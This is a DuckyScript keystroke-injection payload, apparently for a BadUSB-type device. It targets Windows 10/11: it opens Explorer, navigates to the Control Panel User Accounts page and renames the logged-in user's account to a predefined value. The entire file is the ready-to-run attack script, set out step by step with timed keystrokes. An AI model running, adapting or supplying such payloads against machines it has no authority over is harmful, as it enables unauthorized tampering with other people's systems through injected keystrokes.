REM #############################################
REM #                                           |
REM # Title        : Change Windows User Name   |
REM # Author       : Aleff                      |
REM # Version      : 1.0                        |
REM # Category     : Execute                    |
REM # Target       : Windows 10/11              |
REM #                                           |
REM #############################################

REM Requirements:
REM     - Nothing

REM Note:
REM     - Payload tested on Windows 11 Eng 

REM Set the new name that you want to set
DEFINE NEW_NAME example

REM Open Windows research
DELAY 2000
GUI
DELAY 1000

REM Search and opern explorer app
STRING explorer
ENTER
DELAY 1000

REM Goto search bar and open User Accounts settings
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
ENTER
DELAY 500
STRING Control Panel\All Control Panel Items\User Accounts
ENTER
DELAY 1500

REM Goto "Change you account name"
TAB
DELAY 500
ENTER
DELAY 500

STRING NEW_NAME
DELAY 500
TAB
DELAY 500
ENTER
DELAY 1000
ALT F4
